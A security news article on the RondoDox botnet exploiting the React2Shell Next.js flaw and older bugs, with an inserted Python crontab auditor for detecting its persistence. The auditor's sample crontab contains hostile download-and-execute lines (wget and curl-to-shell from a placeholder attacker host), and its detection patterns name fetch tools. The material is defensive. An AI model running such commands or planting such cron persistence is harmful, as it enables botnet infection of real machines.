
Unpatched React2Shell Vulnerability lets RondoDox Botnet Grow in IoT Attack Campaigns


Cybersecurity researchers have uncovered details of a persistent, nine-month-long campaign that actively targets Internet of Things (IoT) devices and web applications to conscript them into a botnet known as RondoDox.

As of December 2025, attackers have leveraged the recently disclosed React2Shell (CVE-2025-55182, CVSS score: 10.0) vulnerability as an initial access vector, according to an analysis from CloudSEK.

React2Shell Emerges as a Critical Initial Access Vector

React2Shell refers to a critical security flaw affecting React Server Components (RSC) and Next.js that allows unauthenticated attackers to execute arbitrary code remotely on vulnerable systems.

Meanwhile, data from the Shadowserver Foundation indicates that approximately 90,300 instances remain exposed to the vulnerability as of December 31, 2025. Notably, 68,400 instances operate in the U.S., followed by Germany (4,300), France (2,800), and India (1,500).

Since its emergence in early 2025, RondoDox has steadily expanded its reach by incorporating new N-day vulnerabilities into its exploit arsenal, including CVE-2023-1389 and CVE-2025-24893. Importantly, Darktrace, Kaspersky, and VulnCheck previously documented the abuse of React2Shell to propagate the botnet.

Multi-Phase Attack Progression Observed

Analysts assess that the RondoDox botnet campaign progressed through three distinct phases prior to exploiting CVE-2025-55182:

  • March – April 2025: Initial reconnaissance and manual vulnerability scanning
  • April – June 2025: Daily mass probing of web applications such as WordPress, Drupal, and Struts2, alongside IoT devices including Wavlink routers
  • July – early December 2025: Hourly, large-scale automated deployment

In attacks observed during December 2025, threat actors initiated scans to identify vulnerable Next.js servers and subsequently attempted to deploy cryptocurrency miners (“/nuts/poop”), a botnet loader and health-check utility (“/nuts/bolts”), and a Mirai botnet variant (“/nuts/x86”) on compromised systems.

Botnet Loader Eliminates Rivals and Establishes Persistence

The “/nuts/bolts” component actively removes competing malware and coin miners before downloading the primary bot payload from its command-and-control (C2) server. Researchers identified one variant that eradicates known botnets, Docker-based payloads, remnants of earlier campaigns, and associated cron jobs, while simultaneously establishing persistence via “/etc/crontab.”

“It continuously scans /proc to enumerate running executables and kills non-whitelisted processes every ~45 seconds, effectively preventing reinfection by rival actors,” CloudSEK said.
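As an added, defender-side example (not code from the CloudSEK report or this article), the following Python audits /etc/crontab-style entries for the fetch-and-execute persistence pattern described above. The sample crontab, the placeholder host and the regex heuristics are constructed assumptions; only the /nuts/* payload names come from the article.

```python
import re
# Constructed /etc/crontab sample, not from the CloudSEK report. The last two
# entries mimic the fetch-and-execute persistence described above; the host is a
# placeholder and the /nuts/* names are the payload names the article cites.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
0 6 * * * root /usr/sbin/logrotate /etc/logrotate.conf
# constructed malicious entries
* * * * * root wget -q http://attacker.invalid/nuts/bolts -O /tmp/bolts && chmod +x /tmp/bolts && /tmp/bolts
@reboot root curl -fsSL http://attacker.invalid/nuts/x86 | sh
"""

FETCH = re.compile(r"\b(curl|wget|tftp|ftpget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(sh|bash|ash|dash)\b")
WRITABLE_DIR = re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/\S+")
KNOWN_NAMES = ("/nuts/bolts", "/nuts/x86", "/nuts/poop")  # cited in the article

def parse_crontab(text, system=True):
    """Yield (line_no, user, command) for active entries; system=True selects
    the /etc/crontab layout, which carries a user column after the schedule."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:                               # variable assignment
            continue
        nfields = 1 if first.startswith("@") else 5    # @reboot vs 5 time fields
        parts = line.split(None, nfields + (1 if system else 0))
        if len(parts) < nfields + (2 if system else 1):
            continue                                   # malformed, no command
        yield n, (parts[nfields] if system else None), parts[-1]

def audit_crontab(text, system=True):
    """Return [(line_no, reasons, command)] for fetch-and-execute persistence entries."""
    findings = []
    for n, _user, cmd in parse_crontab(text, system):
        reasons = []
        if FETCH.search(cmd) and (PIPE_TO_SHELL.search(cmd) or "&&" in cmd or ";" in cmd):
            reasons.append("fetches remote content and executes it")
        if WRITABLE_DIR.search(cmd):
            reasons.append("runs a binary from a world-writable directory")
        if any(name in cmd for name in KNOWN_NAMES):
            reasons.append("references a RondoDox payload name")
        if reasons:
            findings.append((n, reasons, cmd))
    return findings
```

The heuristics are deliberately loose (a cron job that fetches and then chains any command is flagged), so treat hits as triage leads to be checked against the host's expected jobs.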

Recommended Mitigation Measures

To reduce exposure to this threat, security teams should immediately update Next.js to a patched release, segment IoT devices into dedicated VLANs, deploy Web Application Firewalls (WAFs), closely monitor for suspicious process execution, and block known RondoDox C2 infrastructure.

Source: TheHackerNews
